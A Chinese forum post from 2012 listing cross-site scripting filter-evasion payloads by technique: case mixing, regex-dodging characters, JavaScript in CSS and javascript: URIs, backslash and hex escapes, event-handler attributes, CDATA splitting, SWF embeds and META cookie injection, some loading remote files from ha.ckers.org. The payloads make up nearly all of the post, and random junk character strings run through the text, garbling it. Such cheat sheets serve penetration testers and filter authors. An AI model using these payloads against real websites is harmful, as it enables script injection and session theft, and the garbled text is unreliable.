1. 改变字符大小写
% ~7 S$ g7 |$ o" r) l5 Q" p3 b
0 D7 G5 r! w+ s$ M2 s& v$ T6 z- \ : N) U# a& M. g+ `6 y Q
& T' V" p7 r/ q4 P7 L7 d$ s <sCript>alert(‘d’)</scRipT>
3 R0 }% }; M* |. q( q7 `) E0 @, O1 e8 f% }
2. 利用多加一些其它字符来规避Regular Expression的检查0 a6 d N3 u% Z$ c `
! F$ \% h& s! i! B) C) o2 H
<<script>alert(‘c’)//<</script>
7 Y% y6 z7 i$ b" O
3 N: C5 a) [5 z$ H/ p! r0 j <SCRIPT a=">" SRC="t.js"></SCRIPT>& _) P, f h' z6 K
1 b1 e. i- X( r' B, M" o% H" p7 c* b
<SCRIPT =">" SRC="t.js"></SCRIPT>
) L+ l/ b! R/ i& n
7 g8 y& L- X, [ g0 i7 i <SCRIPT a=">" ” SRC="t.js"></SCRIPT>2 c0 ~* h# t- ]& n
6 v7 V! P J7 M1 P- d+ S$ y5 D
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>" Z8 Q* N2 v. ?9 J) m
! S( D! C+ a: v! ?( l9 K
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
; U: O" U% b2 o' ]8 N. ~! x
. E# @; U3 {& _, f <SCRIPT a=">’>" SRC="t.js"></SCRIPT>
4 P3 G! j' h5 o$ Z4 u& [; J" M) m) Q3 A9 {
! {& {. m* V5 I8 X2 \( Y" t6 s; j3. 以其它扩展名取代.js/ V! g6 m. D. I; x5 B1 B
# f! h" b9 b1 T: N6 D <script src="bad.jpg"></script>* F( T7 i5 F. K. B$ a
9 N$ Q& t( M0 L9 a% q3 }, R* G4. 将Javascript写在CSS档里
% I, I$ j+ P5 f' r# k
4 y1 m. ^7 Y/ Y" G& I <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
# h9 h1 _; @( C, @1 ~( e8 ~4 |" ]1 Y- Y' U7 q! n3 f+ G
example:. Q% @# ? B& x( [
7 z+ a6 ?4 P# J4 \0 ?- i: m body {
" e' T- A6 R& {' X8 @7 ?; `
1 q8 b7 v; J$ M n background-image: url(‘javascript:alert("XSS");’)
. ]( ^! M/ y3 E: E Z$ z% c: e* b9 I3 Q g+ ?
}$ B: e2 T# O' V
$ F- u5 G K/ c/ O0 m5. 在script的tag里加入一些其它字符
, d) V% J3 m0 P0 r9 I; O; Y" ]* _, _ [' h: M9 o* G3 h, M" y
<SCRIPT/SRC="t.js"></SCRIPT>
+ ~4 r. D) u& h% p' L2 F
) H! r ]( H# ]7 l/ p/ R <SCRIPT/anyword SRC="t.js"></SCRIPT>5 w& W4 m# L% l2 C) Y$ d
, r5 q5 z9 q2 ]/ G
6. 使用tab或是new line来规避
7 v4 I9 n7 n* a, ~4 g$ x7 Q/ Y! [4 x; t" y9 e
<img src="jav ascr ipt:alert(‘XSS3′)">: u9 ^- B" u0 q7 R
7 E6 t$ R% `, P2 k5 k8 G
<img src="jav ascr ipt:alert(‘XSS3′)">5 q( m- k* e% b
& `( K. T0 t1 r <IMG SRC="jav ascript:alert(‘XSS’);">
' q/ }3 `! |% G( W! L) e- P/ [* ?3 Z8 R1 L0 G; r, p
-> tag
4 }' c5 @9 i) R$ H) j$ N9 `! P% x, C; N# X
-> new line
, K2 U& X) L* |6 f3 M1 S1 ]
3 m+ v/ Q0 u0 f- e5 b7 S7. 使用"\"来规避
6 \6 _/ y/ i' K! k D' Z- V% x1 s0 W5 r% Z% ? @5 z
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
4 N: i9 @" s+ F- J0 |8 [7 z* l; w& Z$ B) \+ o1 M
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
" ?$ e* e+ u* o! g9 [: a# l
9 J7 V" S3 P: I( a- X <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
4 }! X M2 V3 |- F- B `
* W) ]2 a: F( Q% \5 C <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));"># [9 b2 I- e* a5 @; M5 b& w
' v6 n+ k! D! T <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
7 B& H5 E' P0 i1 b: G/ g1 l4 E4 }4 P& [ o5 O' r
8. 使用Hex encode来规避(也可能会把";"拿掉)+ b0 |/ ]9 p( b. o
" ]1 x* p, C% p <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">, k7 h# U) q+ p* x
$ M3 S* l6 ^4 B& k 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" j6 w3 G5 T; @
3 ^5 L) o4 l/ x( i2 H( W% V
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">/ g, U1 F6 V T. U" F0 _! l
# g/ Z' y% [6 `5 `
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
9 B5 y [' A5 T; T4 E2 D- G$ Y. q& G4 O! H/ ~9 `" O
9. script in HTML tag* w- L& s( E, M1 N" p9 [* D& w
6 n1 w: U; H4 D" F <body onload=」alert(‘onload’)」># P0 } `0 z1 Q& x% V- F' G3 v/ _& y
# P2 u$ T S. w1 a7 A) y
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
]7 e S9 c' y/ J' Q6 ]3 P1 Q+ A/ w# g ~
10. 在swf里含有xss的code
8 B+ N& ?# D7 \% H" K* P, `( G
: X! h; o9 \9 m9 @* f! U$ n: P/ m <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
, W. n& o/ [. G6 O" v3 P
6 k( o/ X' `. Z: r11. 利用CDATA将xss的code拆开,再组合起来。1 R+ L1 U) L( S: ^3 a5 r
( p% r5 }6 k+ n# _' k/ D9 e- W <XML ID=I><X><C>
: q s6 a: c+ v& J0 e2 c8 y! ~! r. Z: u
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> Y* Q9 L7 k/ v, p
; J6 v+ M' L& A. @- Q0 H* ?" O" H </C></X>2 I1 W! L9 ]' I& S, g
7 f; M2 {& f6 A5 v8 H; w' f
</xml>& g. m) t. o# K$ g* y
. g8 p3 b3 |2 X% c6 `; e0 g4 } <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>/ m+ P5 `. i9 Y6 R' t9 }* H/ T
4 j' s* D4 e+ T. n: O
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
, c! M Z2 g( b: Y7 {. J
8 N7 x+ X- f4 @; ~4 J& u) Z <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>' \9 X* D1 t0 n9 g5 \: q% C% T
2 Y' Q+ [; x6 z, I' p
12. 利用HTML+TIME。
6 ^. f6 E4 r: l
c% D% V; y+ ^$ r, W: H8 Y <HTML><BODY>
* P: B) i6 I2 j
- O/ M% j3 X; ]( \: V1 A) r <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">$ n: f( f9 w" [
9 C, i, w: T' `" ~0 _ c. Q
<?import namespace="t" implementation="#default#time2">3 b) L7 h+ n6 D% f
G9 ? i" \7 H6 V5 A( J9 `
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
8 M% e4 k, o2 y9 u7 b: p8 w
3 g2 p% h9 B& k( _* } </BODY></HTML>
! A9 N9 M/ T% q2 O4 C. S* X# {* K4 _% [7 ^# S2 x& n5 G
13. 透过META写入Cookie。
6 y4 M. G7 Y: f" F! N8 D& h0 `( n7 |2 [& ]
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">/ V* A2 v9 M; O
9 {7 p$ O F$ j; T2 S5 R, g6 _14. javascript in src , href , url: ?" S ~! B0 V3 D
5 D O& G6 \+ [7 \ <IFRAME SRC=javascript:alert(’13′)></IFRAME>7 a+ P+ ] e$ N# o. V
% C* w* k, t* B
<img src="javascript:alert(‘XSS3′)">
0 V# J$ X3 E7 _, a
! z( m6 }" [9 p8 T/ l<IMG DYNSRC="javascript:alert(‘XSS20′)">
' A& a0 J. y# X$ b9 M4 ]8 q6 ^
- X! u# C" D1 O6 f3 A <IMG LOWSRC="javascript:alert(‘XSS21′)">0 ^- W4 k* Y- t
) K- M3 W8 E$ W5 w <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
9 j4 B$ ~/ @# `$ r& c: j" V/ t. j5 k" r2 @ H9 b- @9 Q) Q' }
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
9 u6 w# J& D, e
- ]; I- ~% m) Z& A <TABLE BACKGROUND="javascript:alert(‘XSS29′)">9 I4 G6 F* Y0 E' A" k$ H# X7 X. q
o' b2 F/ S0 n* w
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
8 a6 M+ M- i% [1 i1 E( K" L" G: K7 j* T+ {) V) j7 Q* k
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
# X% v6 L; G0 i) s. Y. ]+ a/ A* \% l: c
</STYLE><A CLASS=XSS></A>
* A9 V- x- P' g, p6 }; z; z# L3 L! N6 X; T1 H8 Q& Q
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>4 Z; s) f6 j: H) e @8 c ?
/ [# A8 C+ g) z1 R/ g, H |
发表于 2012-12-31 09:59:28
收藏
支持
反对